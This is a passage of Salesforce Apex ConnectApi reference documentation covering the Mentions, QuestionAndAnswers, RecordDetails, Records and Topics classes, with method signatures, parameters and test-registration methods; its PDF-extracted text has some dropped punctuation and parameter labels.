Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
parentId
Type: String
The feed item parent ID (for new feed items) or feed item ID (for comments).
recordIds
Type: List<String>
A comma separated list of IDs to be mentioned. The maximum value is 25.
visibility
Type: ConnectApi.FeedItemVisibilityType
Return Value
Type: ConnectApi.MentionValidations
Usage
Call this method to check whether the record IDs returned from a call to ConnectApi.Mentions.getMentionCompletions
are valid for the context user. For example, the context user cant mention private groups he doesnt belong to. If such a group were
included in the list of mention validations, the ConnectApi.MentionValidations.hasErrors property would be true
and the group would have a ConnectApi.MentionValidation.valdiationStatus of Disallowed.
928
Reference
Mentions Class
For information about using these methods to test your ConnectApi code, see Testing ConnectApi Code.
API Version
29.0
Signature
public static Void setTestGetMentionCompletions (String communityId, String q, String
contextId, ConnectApi.MentionCompletionPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
A search term. Searches for matching user and group names. To search for a user, a minimum of 1 character is required. To search
for a group, a minimum of 2 characters is required. This parameter does not support wildcards.
contextId
Type: String
A feed item ID (for a mention in a comment) or a feed subject ID (for a mention in a feed item) that narrows search results, with
more useful results listed first.
result
Type: ConnectApi.MentionCompletionPage
A ConnectApi.MentionCompletionPage object containing test data.
Return Value
Type: Void
SEE ALSO:
getMentionCompletions(String, String, String)
Testing ConnectApi Code
929
Reference
Mentions Class
API Version
29.0
Signature
public static Void setTestGetMentionCompletions (String communityId, String q, String
contextId, ConnectApi.MentionCompletionType type, Integer pageParam, Integer pageSize,
ConnectApi.MentionCompletionPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
A search term. Searches for matching user and group names. To search for a user, a minimum of 1 character is required. To search
for a group, a minimum of 2 characters is required. This parameter does not support wildcards.
contextId
Type: String
A feed item ID (for a mention in a comment) or a feed subject ID (for a mention in a feed item) that narrows search results, with
more useful results listed first.
type
Type: ConnectApi.MentionCompletionType
Specifies the type of mention completion:
AllAll mention completions, regardless of the type of record to which the mention refers.
GroupMention completions for groups.
UserMention completions for users.
pageParam
Type: String
Specifies the number of the page you want returned. Starts at 0. If you pass in null or 0, the first page is returned.
pageSize
Type: String
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
result
Type: ConnectApi.MentionCompletionPage
A ConnectApi.MentionCompletionPage object containing test data.
930
Reference
Organization Class
Return Value
Type: Void
SEE ALSO:
getMentionCompletions(String, String, String, ConnectApi.MentionCompletionType, Integer, Integer)
Testing ConnectApi Code
Organization Class
Access information about an organization.
Namespace
ConnectApi
This is the static method of the Organization class:
Organization Methods
The following are methods for Organization. All methods are static.
IN THIS SECTION:
getSettings()
Returns information about the organization and context user, including which features are enabled.
getSettings()
Returns information about the organization and context user, including which features are enabled.
API Version
28.0
Requires Chatter
No
Signature
public static ConnectApi. OrganizationSettings getSettings()
Return Value
Type: ConnectApi.OrganizationSettings
QuestionAndAnswers Class
Access question and answers suggestions.
931
Reference
QuestionAndAnswers Class
Namespace
ConnectApi
IN THIS SECTION:
QuestionAndAnswers Methods
QuestionAndAnswers Methods
The following are methods for QuestionAndAnswers. All methods are static.
IN THIS SECTION:
getSuggestions(String, String, String, Boolean, Integer)
Returns question and answers suggestions.
setTestGetSuggestions(String, String, String, Boolean, Integer, ConnectApi.QuestionAndAnswersSuggestions)
Registers a ConnectApi.QuestionAndAnswersSuggestions object to be returned when getSuggestions is
called with matching parameters in a test context. You must use the method with the same parameters or the code throws an
exception.
updateQuestionAndAnswers(String, String, ConnectApi.QuestionAndAnswersCapabilityInput)
Choose or change the best answer for a question.
API Version
32.0
Requires Chatter
No
Signature
public static ConnectApi.QuestionAndAnswersSuggestions getSuggestions(String communityId,
String q, String subjectId, Boolean includeArticles, Integer maxResults)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
932
Reference
QuestionAndAnswers Class
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
subjectId
Type: String
Specify a subject ID to search only questions on that object. If the ID is a topic or a user, the ID is ignored.
includeArticles
Type: Boolean
Specify true to include knowledge articles in the search results. To return only questions, specify false.
maxResults
Type: Integer
The maximum number of results to return for each type of item. Possible values are 110. The default value is 5.
Return Value
Type: ConnectApi.QuestionAndAnswersSuggestions
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestGetSuggestions(String, String, String, Boolean, Integer, ConnectApi.QuestionAndAnswersSuggestions)
Testing ConnectApi Code
API Version
32.0
Signature
public static Void setTestGetSuggestions(String communityId, String q, String subjectId,
Boolean includeArticles, Integer maxResults, ConnectApi.QuestionAndAnswersSuggestions
result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
933
Reference
QuestionAndAnswers Class
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
subjectId
Type: String
Specify a subject ID to search only questions on that object. If the ID is a topic or a user, the ID is ignored.
includeArticles
Type: Boolean
Specify true to include knowledge articles in the search results. To return only questions, specify false.
maxResults
Type: Integer
The maximum number of results to return for each type of item. Possible values are 110. The default value is 5.
result
Type: ConnectApi.QuestionAndAnswersSuggestions
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getSuggestions(String, String, String, Boolean, Integer)
Testing ConnectApi Code
API Version
32.0
Requires Chatter
Yes
Signature
public static ConnectApi.QuestionAndAnswersCapability updateQuestionAndAnswers(String
communityId, String feedElementId, ConnectApi.QuestionAndAnswersCapabilityInput
questionAndAnswersCapability)
934
Reference
RecordDetails Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedElementId
Type: String
The ID for a feed element.
questionAndAnswersCapability
Type: ConnectApi.QuestionAndAnswersCapabilityInput
Specify the best answer (comment ID) for the question.
Return Value
Type: ConnectApi.QuestionAndAnswersCapability
If the feed element doesnt support this capability, the return value is ConnectApi.NotFoundException on page 1086.
Example
ConnectApi.QuestionAndAnswersCapabilityInput qaInput = new
ConnectApi.QuestionAndAnswersCapabilityInput();
qaInput.bestAnswerId = '0D7D00000000lMAKAY';
ConnectApi.QuestionAndAnswersCapability qa =
ConnectApi.QuestionAndAnswers.updateQuestionAndAnswers(null, '0D5D0000000XZjJ', qaInput);
RecordDetails Class
Access information about records in your organization.
Namespace
ConnectApi
RecordDetails Methods
The following are methods for RecordDetails. All methods are static.
IN THIS SECTION:
getRecentRecords(String, String)
Returns a list of objects that contain summary information about records recently added, edited, or viewed by the context user.
getRecentRecords(String, String, Integer)
Returns an object that contains a list populated by the specified number of objects. Each object contains summary information
about a record recently added, edited, or viewed by the context user.
935
Reference
RecordDetails Class
getRecordView(String, String)
Returns a RecordView object, which contains a combined view of layout information (metadata) and data for the specified
record.
getRecentRecords(String, String)
Returns a list of objects that contain summary information about records recently added, edited, or viewed by the context user.
API Version
30.0
Requires Chatter
No
Signature
public static ConnectApi.RecordSummaryList getRecentRecords(String communityId, String
userId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
userId
Type: String
The ID for the context user or the keyword me.
Return Value
Type: ConnectApi.RecordSummaryList
An object that contains a list of record objects. The records can be of any type in the organization, including custom objects. The record
objects are summary objects, not detail objects.
API Version
30.0
Requires Chatter
No
936
Reference
RecordDetails Class
Signature
public static ConnectApi.RecordSummaryList getRecentRecords(String communityId, String
userId, Integer size)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
userId
Type: String
The ID for the context user or the keyword me.
size
Type: Integer
The maximum number of recently used objects to return between 1150. The default value is 10.
Return Value
Type: ConnectApi.RecordSummaryList
An object that contains a list of record objects. The records can be of any type in the organization, including custom objects. The record
objects are summary objects, not detail objects.
getRecordView(String, String)
Returns a RecordView object, which contains a combined view of layout information (metadata) and data for the specified record.
Available in: Unlimited, Enterprise, and Developer Editions
API Version
30.0
Requires Chatter
No
Signature
public static ConnectApi.RecordView getRecordView(String communityId, String recordId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
937
Reference
RecordDetails Class
recordId
Type: String
The ID of a record.
Return Value
Type: ConnectApi.RecordView
A view of any record in the organization, including a custom object record. This object is used if a specialized object, such as User or
ChatterGroup, is not available for the record type.
Usage
This method uses a whitelist to determine whether to return information about a record. If the object type in the recordId argument
is not in the whitelist, the call returns the error "ConnectApi.ConnectApiException: Object type not supported".
These are the supported objects:
Object Type
Available
Custom objects
30.0
Account
30.0
Campaign
30.0
Case
30.0
CollaborationGroup
30.0
Contact
30.0
ContentDocument
30.0
ContentVersion
30.0
Contract
30.0
Dashboard
30.0
Event
30.0
Lead
30.0
LiveChatTranscript
30.0
Opportunity
30.0
OpportunityLineItem
30.0
Product
30.0
ServiceContract
30.0
Solution
30.0
Task
30.0
User
30.0
938
Reference
Records Class
Records Class
Access information about record motifs, which are small icons used to distinguish record types in the Salesforce UI.
Namespace
ConnectApi
Records Methods
The following are methods for Records. All methods are static.
IN THIS SECTION:
getMotif(String, String)
Returns a Motif object that contains the URLs for a set of small, medium, and large motif icons for the specified record. It can also
contain a base color for the record.
getMotifBatch(String, List<String>)
Gets a motif for the specified list of objects. Returns a list of BatchResult objects containing ConnectApi.Motif objects.
Returns errors embedded in the results for those users that couldnt be loaded.
getMotif(String, String)
Returns a Motif object that contains the URLs for a set of small, medium, and large motif icons for the specified record. It can also
contain a base color for the record.
API Version
28.0
Requires Chatter
No
Signature
public static ConnectApi.Motif getMotif(String communityId, String idOrPrefix)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
idOrPrefix
Type: String
An ID or key prefix.
939
Reference
Records Class
Return Value
Type: ConnectApi.Motif
Usage
Each Salesforce record type has its own set of motif icons. See ConnectApi.Motif.
getMotifBatch(String, List<String>)
Gets a motif for the specified list of objects. Returns a list of BatchResult objects containing ConnectApi.Motif objects.
Returns errors embedded in the results for those users that couldnt be loaded.
API Version
31.0
Requires Chatter
No
Signature
public static ConnectApi.BatchResult[] getMotifBatch(String communityId, List<String>
idOrPrefixList)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
idOrPrefixList
Type: List<String>
A list of object IDs or prefixes.
Return Value
Type: BatchResult[]
The BatchResult.getResults() method returns a ConnectApi.Motif object.
Example
String communityId = null;
// Create a list of records.
ConnectApi.RecordSummaryList recordList =
ConnectApi.RecordDetails.getRecentRecords(communityId, 'me');
// Create a list of record IDs.
List<String> recordIds = new List<String>();
940
Reference
Topics Class
Topics Class
Access information about topics, such as their descriptions, the number of people talking about them, related topics, and information
about groups contributing to the topic. Update a topics name or description, and add and remove topics from records and feed items.
Namespace
ConnectApi
Topics Methods
The following are methods for Topics. All methods are static.
IN THIS SECTION:
assignTopic(String, String, String)
Assigns the specified topic to the specified record or feed item. Only users with the Assign Topics permission can add existing
topics to records or feed items. Administrators must enable topics for objects before users can add topics to records of that object
type.
assignTopicByName(String, String, String)
Assigns the specified topic to the specified record or feed item. Only users with the Assign Topics permission can add existing
topics to records or feed items. Only users with the Create Topics permission can add new topics to records or feed items.
Administrators must enable topics for objects before users can add topics to records of that object type.
941
Reference
Topics Class
deleteTopic(String, String)
Deletes the specified topic. Only users with the Delete Topics or Modify All Data permission can delete topics.
getGroupsRecentlyTalkingAboutTopic(String, String)
Returns information about the five groups that most recently contributed to the specified topic.
getRecentlyTalkingAboutTopicsForGroup(String, String)
Returns up to five topics most recently used in the specified group.
getRecentlyTalkingAboutTopicsForUser(String, String)
Topics recently used by the specified user. Get up to five topics most recently used by the specified user.
getRelatedTopics(String, String)
List of five topics most closely related to the specified topic.
getTopic(String, String)
Returns information about the specified topic.
getTopics(String, String)
Returns the first page of topics assigned to the specified record or feed item. Administrators must enable topics for objects before
users can add topics to records of that object type.
getTopics(String)
Returns the first page of topics for the organization.
getTopics(String, ConnectApi.TopicSort)
Returns the first page of topics for the organization in the specified order.
getTopics(String, Integer, Integer)
Returns the topics for the specified page.
getTopics(String, Integer, Integer, ConnectApi.TopicSort)
Returns the topics for the specified page in the specified order.
getTopics(String, String, ConnectApi.TopicSort)
Returns the topics that match the specified search criteria in the specified order.
getTopics(String, String, Integer, Integer)
Returns the topics that match the specified search criteria for the specified page.
getTopics(String, String, Integer, Integer, ConnectApi.TopicSort)
Returns the topics that match the specified search criteria for the specified page in the specified order.
getTopicSuggestions(String, String, Integer)
Returns suggested topics for the specified record or feed item. Administrators must enable topics for objects before users can see
suggested topics for records of that object type.
getTopicSuggestions(String, String)
Returns suggested topics for the specified record or feed item. Administrators must enable topics for objects before users can see
suggested topics for records of that object type.
getTopicSuggestionsForText(String, String, Integer)
Returns suggested topics for the specified string of text.
getTopicSuggestionsForText(String, String)
Returns suggested topics for the specified string of text.
getTrendingTopics(String)
List of the top five trending topics for the organization.
942
Reference
Topics Class
getTrendingTopics(String, Integer)
List of the top five trending topics for the organization.
unassignTopic(String, String, String)
Removes the specified topic from the specified record or feed item. Only users with the Assign Topics permission can remove
topics from feed items or records. Administrators must enable topics for objects before users can add topics to records of that object
type.
updateTopic(String, String, ConnectApi.TopicInput)
Updates the description or name of the specified topic.
API Version
29.0
Requires Chatter
No
Signature
public static ConnectApi.Topic assignTopic(String communityId, String recordId, String
topicId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
recordId
Type: String
The ID for a record or feed item.
topicId
Type: String
The ID for a topic.
Return Value
Type: ConnectApi.Topic
943
Reference
Topics Class
API Version
29.0
Requires Chatter
No
Signature
public static ConnectApi.Topic assignTopicByName(String communityId, String recordId,
String topicName)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
recordId
Type: String
The ID of the record or feed item to which to assign the topic.
topicName
Type: String
The name of a new or existing topic.
Return Value
Type: ConnectApi.Topic
deleteTopic(String, String)
Deletes the specified topic. Only users with the Delete Topics or Modify All Data permission can delete topics.
API Version
29.0
Requires Chatter
No
944
Reference
Topics Class
Signature
public static Void deleteTopic(String communityId, String topicId)
Parameters
communityId
Type: String,
Use either the ID for a community, internal, or null.
topicId
Type: String
The ID for a topic.
Return Value
Type: Void
getGroupsRecentlyTalkingAboutTopic(String, String)
Returns information about the five groups that most recently contributed to the specified topic.
API Version
29.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterGroupSummaryPage
getGroupsRecentlyTalkingAboutTopic(String communityId, String topicId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
topicId
Type: String
The ID for a topic.
945
Reference
Topics Class
Return Value
Type: ConnectApi.ChatterGroupSummaryPage
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestGetGroupsRecentlyTalkingAboutTopic(String, String, ConnectApi.ChatterGroupSummaryPage)
Testing ConnectApi Code
getRecentlyTalkingAboutTopicsForGroup(String, String)
Returns up to five topics most recently used in the specified group.
API Version
29.0
Requires Chatter
Yes
Signature
public static ConnectApi.TopicPage getRecentlyTalkingAboutTopicsForGroup(String
communityId, String groupId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
groupId
Type: String
The ID for a group.
Return Value
Type: ConnectApi.TopicPage
946
Reference
Topics Class
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestGetRecentlyTalkingAboutTopicsForGroup(String, String, ConnectApi.TopicPage)
Testing ConnectApi Code
getRecentlyTalkingAboutTopicsForUser(String, String)
Topics recently used by the specified user. Get up to five topics most recently used by the specified user.
API Version
29.0
Requires Chatter
Yes
Signature
public static ConnectApi.TopicPage getRecentlyTalkingAboutTopicsForUser(String
communityId, String userId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
userId
Type: String
The ID for a user.
Return Value
Type: ConnectApi.TopicPage
947
Reference
Topics Class
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestGetRecentlyTalkingAboutTopicsForUser(String, String, ConnectApi.TopicPage)
Testing ConnectApi Code
getRelatedTopics(String, String)
List of five topics most closely related to the specified topic.
API Version
29.0
Requires Chatter
No
Signature
public static ConnectApi.TopicPage getRelatedTopics(String communityId, String topicId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
topicId
Type: String
The ID for a topic.
Return Value
Type: ConnectApi.TopicPage
948
Reference
Topics Class
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestGetRelatedTopics(String, String, ConnectApi.TopicPage)
Testing ConnectApi Code
getTopic(String, String)
Returns information about the specified topic.
API Version
29.0
Requires Chatter
No
Signature
public static ConnectApi.Topic getTopic(String communityId, String topicId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
topicId
Type: String
The ID for a topic.
Return Value
Type: ConnectApi.Topic
getTopics(String, String)
Returns the first page of topics assigned to the specified record or feed item. Administrators must enable topics for objects before users
can add topics to records of that object type.
949
Reference
Topics Class
API Version
29.0
Requires Chatter
No
Signature
public static ConnectApi.TopicPage getTopics(String communityId, String recordId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
recordId
Type: String
The ID for a record or feed item.
Return Value
Type: ConnectApi.TopicPage
getTopics(String)
Returns the first page of topics for the organization.
API Version
29.0
Requires Chatter
No
Signature
public static ConnectApi.TopicPage getTopics(String communityId)
950
Reference
Topics Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
Return Value
Type: ConnectApi.TopicPage
getTopics(String, ConnectApi.TopicSort)
Returns the first page of topics for the organization in the specified order.
API Version
29.0
Requires Chatter
No
Signature
public static ConnectApi.TopicPage getTopics(String communityId, ConnectApi.TopicSort
sortParam)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
sortParam
Type: ConnectApi.TopicSort
Values are:
popularDescSorts topics by popularity with the most popular first. This value is the default.
alphaAscSorts topics alphabetically.
Return Value
Type: ConnectApi.TopicPage
951
Reference
Topics Class
API Version
29.0
Requires Chatter
No
Signature
public static ConnectApi.TopicPage getTopics(String communityId, Integer pageParam,
Integer pageSize)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
pageParam
Type: Integer
Specifies the number of the page you want returned. Starts at 0. If you pass in null or 0, the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
Return Value
Type: ConnectApi.TopicPage
API Version
29.0
Requires Chatter
No
952
Reference
Topics Class
Signature
public static ConnectApi.TopicPage getTopics(String communityId, Integer pageParam,
Integer pageSize, ConnectApi.TopicSort sortParam)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
pageParam
Type: Integer
Specifies the number of the page you want returned. Starts at 0. If you pass in null or 0, the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.TopicSort
Values are:
popularDescSorts topics by popularity with the most popular first. This value is the default.
alphaAscSorts topics alphabetically.
Return Value
Type: ConnectApi.TopicPage
API Version
29.0
Requires Chatter
No
Signature
public static ConnectApi.TopicPage getTopics(String communityId, String q,
ConnectApi.TopicSort sortParam)
953
Reference
Topics Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
Specifies the string to search. The string must contain at least two characters, not including wildcards.
sortParam
Type: ConnectApi.TopicSort
Values are:
popularDescSorts topics by popularity with the most popular first. This value is the default.
alphaAscSorts topics alphabetically.
Return Value
Type: ConnectApi.TopicPage
API Version
29.0
Requires Chatter
No
Signature
public static ConnectApi.TopicPage getTopics(String communityId, String q, Integer
pageParam, Integer pageSize)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
Specifies the string to search. The string must contain at least two characters, not including wildcards.
954
Reference
Topics Class
pageParam
Type: Integer
Specifies the number of the page you want returned. Starts at 0. If you pass in null or 0, the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
Return Value
Type: ConnectApi.TopicPage
API Version
29.0
Requires Chatter
No
Signature
public static ConnectApi.TopicPage getTopics(String communityId, String q, Integer
pageParam, Integer pageSize, ConnectApi.TopicSort sortParam)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
Specifies the string to search. The string must contain at least two characters, not including wildcards.
pageParam
Type: Integer
Specifies the number of the page you want returned. Starts at 0. If you pass in null or 0, the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
955
Reference
Topics Class
sortParam
Type: ConnectApi.TopicSort
Values are:
popularDescSorts topics by popularity with the most popular first. This value is the default.
alphaAscSorts topics alphabetically.
Return Value
Type: ConnectApi.TopicPage
API Version
29.0
Requires Chatter
No
Signature
public static ConnectApi.TopicSuggestionPage getTopicSuggestions(String communityId,
String recordId, Integer maxResults)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
recordId
Type: String
The ID for a record or feed item.
maxResults
Type: Integer
Maximum number of topic suggestions that get returned. The default is 5. Value must be greater than 0 and less than or equal to
25.
Return Value
Type: ConnectApi.TopicSuggestionPage
956
Reference
Topics Class
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestGetTopicSuggestions(String, String, Integer, ConnectApi.TopicSuggestionPage)
Testing ConnectApi Code
getTopicSuggestions(String, String)
Returns suggested topics for the specified record or feed item. Administrators must enable topics for objects before users can see
suggested topics for records of that object type.
API Version
29.0
Requires Chatter
No
Signature
public static ConnectApi.TopicSuggestionPage getTopicSuggestions(String communityId,
String recordId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
recordId
Type: String
The ID for a record or feed item.
Return Value
Type: ConnectApi.TopicSuggestionPage
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestGetTopicSuggestions(String, String, ConnectApi.TopicSuggestionPage)
Testing ConnectApi Code
957
Reference
Topics Class
API Version
29.0
Requires Chatter
No
Signature
public static ConnectApi.TopicSuggestionPage getTopicSuggestionsForText(String
communityId, String text, Integer maxResults)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
text
Type: String
String of text.
maxResults
Type: Integer
Maximum number of topic suggestions that get returned. The default is 5. Value must be greater than 0 and less than or equal to
25.
Return Value
Type: ConnectApi.TopicSuggestionPage
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestGetTopicSuggestionsForText(String, String, Integer, ConnectApi.TopicSuggestionPage)
Testing ConnectApi Code
getTopicSuggestionsForText(String, String)
Returns suggested topics for the specified string of text.
958
Reference
Topics Class
API Version
29.0
Requires Chatter
No
Signature
public static ConnectApi.TopicSuggestionPage getTopicSuggestionsForText(String
communityId, String text)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
text
Type: String
String of text.
Return Value
Type: ConnectApi.TopicSuggestionPage
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestGetTopicSuggestionsForText(String, String, ConnectApi.TopicSuggestionPage)
Testing ConnectApi Code
getTrendingTopics(String)
List of the top five trending topics for the organization.
API Version
29.0
959
Reference
Topics Class
Requires Chatter
No
Signature
public static ConnectApi.TopicPage getTrendingTopics(String communityId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
Return Value
Type: ConnectApi.TopicPage
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestGetTrendingTopics(String, ConnectApi.TopicPage)
Testing ConnectApi Code
getTrendingTopics(String, Integer)
List of the top five trending topics for the organization.
API Version
29.0
Requires Chatter
No
Signature
public static ConnectApi.TopicPage getTrendingTopics(String communityId, Integer
maxResults)
960
Reference
Topics Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
maxResults
Type: Integer
Maximum number of topic suggestions that get returned. The default is 5. Value must be greater than 0 and less than or equal to
25.
Return Value
Type: ConnectApi.TopicPage
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestGetTrendingTopics(String, Integer, ConnectApi.TopicPage)
Testing ConnectApi Code
API Version
29.0
Requires Chatter
No
Signature
public static Void unassignTopic(String communityId, String recordId, String topicId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
recordId
Type: String
The ID for a record or feed item.
961
Reference
Topics Class
topicId
Type: String
The ID for a topic.
Return Value
Type: Void
API Version
29.0
Requires Chatter
No
Signature
public static ConnectApi.Topic updateTopic(String communityId, String topicId,
ConnectApi.TopicInput topic)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
topicId
Type: String
The ID for a topic.
topic
Type: ConnectApi.TopicInput
A ConnectApi.TopicInput object containing the name and description of the topic.
Return Value
Type: ConnectApi.Topic
Usage
Only users with the Edit Topics or Modify All Data permission can update topic names and descriptions.
962
Reference
Topics Class
For information about using these methods to test your ConnectApi code, see Testing ConnectApi Code.
API Version
29.0
Signature
public static Void setTestGetGroupsRecentlyTalkingAboutTopic(String communityId, String
topicId, ConnectApi.ChatterGroupSummaryPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
topicId
Type: String
The ID for a topic.
result
Type: ConnectApi.ChatterGroupSummaryPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getGroupsRecentlyTalkingAboutTopic(String, String)
Testing ConnectApi Code
API Version
29.0
963
Reference
Topics Class
Signature
public static Void setTestGetRecentlyTalkingAboutTopicsForGroup(String communityId,
String groupId, ConnectApi.TopicPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
groupId
Type: String
The ID for a group.
result
Type: ConnectApi.TopicPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getRecentlyTalkingAboutTopicsForGroup(String, String)
Testing ConnectApi Code
API Version
29.0
Signature
public static Void setTestGetRecentlyTalkingAboutTopicsForUser(String communityId,
String userId, ConnectApi.TopicPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
userId
Type: String
964
Reference
Topics Class
Type: ConnectApi.TopicPage
Specify the test topics page.
Return Value
Type: Void
SEE ALSO:
getRecentlyTalkingAboutTopicsForUser(String, String)
Testing ConnectApi Code
API Version
29.0
Signature
public static Void setTestGetRelatedTopics(String communityId, String topicId,
ConnectApi.TopicPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
topicId
Type: String
The ID for a topic.
result
Type: ConnectApi.TopicPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getRelatedTopics(String, String)
Testing ConnectApi Code
965
Reference
Topics Class
API Version
29.0
Signature
public static Void setTestGetTopicSuggestions(String communityId, String recordId,
Integer maxResults, ConnectApi.TopicSuggestionPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
recordId
Type: String
The ID for a record or feed item.
maxResults
Type: Integer
Maximum number of topic suggestions that get returned. The default is 5. Value must be greater than 0 and less than or equal to
25.
result
Type: ConnectApi.TopicSuggestionPage
Specify the test topic suggestions page.
Return Value
Type: Void
SEE ALSO:
getTopicSuggestions(String, String, Integer)
Testing ConnectApi Code
966
Reference
Topics Class
API Version
29.0
Signature
public static Void setTestGetTopicSuggestions(String communityId, String recordId,
ConnectApi.TopicSuggestionPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
recordId
Type: String
The ID for a record or feed item.
result
Type: ConnectApi.TopicSuggestionPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getTopicSuggestions(String, String)
Testing ConnectApi Code
API Version
29.0
Signature
public static Void setTestGetTopicSuggestionsForText(String communityId, String text,
Integer maxResults, ConnectApi.TopicSuggestionPage result)
Parameters
communityId
Type: String
967
Reference
Topics Class
Type: String
String of text.
maxResults
Type: Integer
Maximum number of topic suggestions that get returned. The default is 5. Value must be greater than 0 and less than or equal to
25.
result
Type: ConnectApi.TopicSuggestionPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getTopicSuggestionsForText(String, String, Integer)
Testing ConnectApi Code
API Version
29.0
Signature
public static Void setTestGetTopicSuggestionsForText(String communityId, String text,
ConnectApi.TopicSuggestionPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
text
Type: String
String of text.
result
Type: ConnectApi.TopicSuggestionPage
968
Reference
Topics Class
Return Value
Type: Void
SEE ALSO:
getTopicSuggestionsForText(String, String)
Testing ConnectApi Code
setTestGetTrendingTopics(String, ConnectApi.TopicPage)
Registers a ConnectApi.TopicPage object to be returned when the matching ConnectApi.getTrendingTopics
method is called in a test context. You must use the method with the same parameters or you receive an exception.
API Version
29.0
Signature
public static Void setTestGetTrendingTopics(String communityId, ConnectApi.TopicPage
result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
result
Type: ConnectApi.TopicPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getTrendingTopics(String)
Testing ConnectApi Code
969
Reference
UserProfiles Class
API Version
29.0
Signature
public static Void setTestGetTrendingTopics(String communityId, Integer maxResults,
ConnectApi.TopicPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
maxResults
Type: Integer
Maximum number of topic suggestions that get returned. The default is 5. Value must be greater than 0 and less than or equal to
25.
result
Type: ConnectApi.TopicPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getTrendingTopics(String, Integer)
Testing ConnectApi Code
UserProfiles Class
Access user profile data. The user profile data populates the profile page (also called the Chatter profile page). This data includes user
information (such as address, manager, and phone number), some user capabilities (permissions), and a set of subtab apps, which are
custom tabs on the profile page.
